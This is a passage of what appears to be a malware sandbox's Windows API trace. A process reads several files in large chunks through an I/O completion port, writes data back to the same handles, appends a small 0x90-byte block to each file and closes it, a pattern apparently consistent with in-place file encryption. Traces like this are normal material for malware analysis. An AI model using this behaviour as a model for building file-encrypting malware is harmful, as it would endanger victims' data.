lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.012] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b00124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3b00020) returned 0x0 [0168.012] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.012] ReadFile (in: hFile=0x1a8, lpBuffer=0x3c20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3c20020) returned 0x0 [0168.012] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.012] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0168.012] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.012] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3680020) returned 1 [0168.012] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.013] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37a0020) returned 1 [0168.013] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.013] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x38c0020) returned 1 [0168.013] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.013] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x39e0020) returned 1 [0168.013] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.013] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b00020) returned 1 [0168.013] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.013] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3c20020) returned 1 [0168.013] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.013] WriteFile (in: hFile=0x1d0, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020) returned 1 [0168.013] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.013] WriteFile (in: hFile=0x1e4, lpBuffer=0x3680094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3680020 | out: lpBuffer=0x3680094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3680020) returned 1 [0168.013] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.013] WriteFile (in: hFile=0x1a0, lpBuffer=0x37a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37a0020) returned 1 [0168.014] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.014] WriteFile (in: hFile=0x1ec, lpBuffer=0x38c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x38c0020) returned 1 [0168.014] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.014] WriteFile (in: hFile=0x198, lpBuffer=0x39e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x39e0020) returned 1 [0168.014] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.014] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b00094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3b00020) returned 1 [0168.014] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.014] WriteFile (in: hFile=0x1a8, lpBuffer=0x3c20094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3c20020) returned 1 [0168.015] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.015] CloseHandle (hObject=0x1d0) returned 1 [0168.016] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0168.019] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.019] CloseHandle (hObject=0x1e4) returned 1 [0168.020] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3680020) returned 1 [0168.022] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.022] CloseHandle (hObject=0x1a0) returned 1 [0168.023] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37a0020) returned 1 [0168.026] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.026] CloseHandle (hObject=0x1ec) returned 1 [0168.027] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x38c0020) returned 1 [0168.029] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.030] CloseHandle (hObject=0x198) returned 1 [0168.031] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x39e0020) returned 1 [0168.033] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.033] CloseHandle (hObject=0x1f0) returned 1 [0168.034] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3b00020) returned 1 [0168.037] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.037] CloseHandle (hObject=0x1a8) returned 1 [0168.038] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3c20020) returned 1 [0168.040] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.079] ReadFile (in: hFile=0x1c8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x710020) returned 1 [0168.079] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.079] WriteFile (in: hFile=0x1c8, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020) returned 1 [0168.085] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.085] ReadFile (in: hFile=0x1c8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x710020) returned 0x0 [0168.086] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.086] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.086] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.086] WriteFile (in: hFile=0x1c8, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020) returned 1 [0168.088] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.088] CloseHandle (hObject=0x1c8) returned 1 [0168.095] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0168.095] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.215] ReadFile (in: hFile=0x1b8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x710020) returned 1 [0168.347] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.421] ReadFile (in: hFile=0x1f0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2b70020) returned 1 [0168.421] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.421] ReadFile (in: hFile=0x1a8, lpBuffer=0x3710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3710020 | out: lpBuffer=0x3710124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3710020) returned 1 [0168.574] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.574] WriteFile (in: hFile=0x1b8, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xfea9, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020) returned 1 [0168.652] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.652] ReadFile (in: hFile=0x1e4, lpBuffer=0x3950124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3950020 | out: lpBuffer=0x3950124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3950020) returned 1 [0168.653] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.653] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3a70020) returned 1 [0168.653] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.653] WriteFile (in: hFile=0x1f0, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x7474, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020) returned 1 [0168.655] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.655] ReadFile (in: hFile=0x1c, lpBuffer=0x3cb0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3cb0020) returned 1 [0168.655] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.655] ReadFile (in: hFile=0x1d4, lpBuffer=0x3dd0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3dd0020 | out: lpBuffer=0x3dd0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3dd0020) returned 1 [0168.656] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.656] WriteFile (in: hFile=0x1a8, lpBuffer=0x3710124, nNumberOfBytesToWrite=0x16ce9, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3710020 | out: lpBuffer=0x3710124, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3710020) returned 0x0 [0168.661] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.662] ReadFile (in: hFile=0x1b8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x710020) returned 0x0 [0168.662] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.662] WriteFile (in: hFile=0x1e4, lpBuffer=0x3950124, nNumberOfBytesToWrite=0x84a8, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3950020 | out: lpBuffer=0x3950124, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3950020) returned 0x0 [0168.666] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.666] WriteFile (in: hFile=0x1c, lpBuffer=0x3cb0124*, nNumberOfBytesToWrite=0x4ef, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3cb0020) returned 1 [0168.701] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0168.703] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3830020) returned 1 [0168.704] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.704] WriteFile (in: hFile=0x1f0, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020) returned 1 [0168.709] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.709] ReadFile (in: hFile=0x19c, lpBuffer=0x3ef0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3ef0020 | out: lpBuffer=0x3ef0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3ef0020) returned 0x0 [0168.709] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.709] ReadFile (in: hFile=0x1a4, lpBuffer=0x4010124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x4010020 | out: lpBuffer=0x4010124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x4010020) returned 0x0 [0168.709] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.709] WriteFile (in: hFile=0x1e4, lpBuffer=0x3950094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3950020 | out: lpBuffer=0x3950094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3950020) returned 1 [0168.715] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.739] CloseHandle (hObject=0x1b8) returned 1 [0168.760] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0168.760] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.760] CloseHandle (hObject=0x1ec) returned 1 [0168.793] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3830020) returned 1 [0168.796] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.800] WriteFile (in: hFile=0x19c, lpBuffer=0x3ef0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3ef0020 | out: lpBuffer=0x3ef0094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3ef0020) returned 1 [0168.829] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.846] CloseHandle (hObject=0x1a4) returned 1 [0168.857] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x4010020) returned 1 [0168.859] 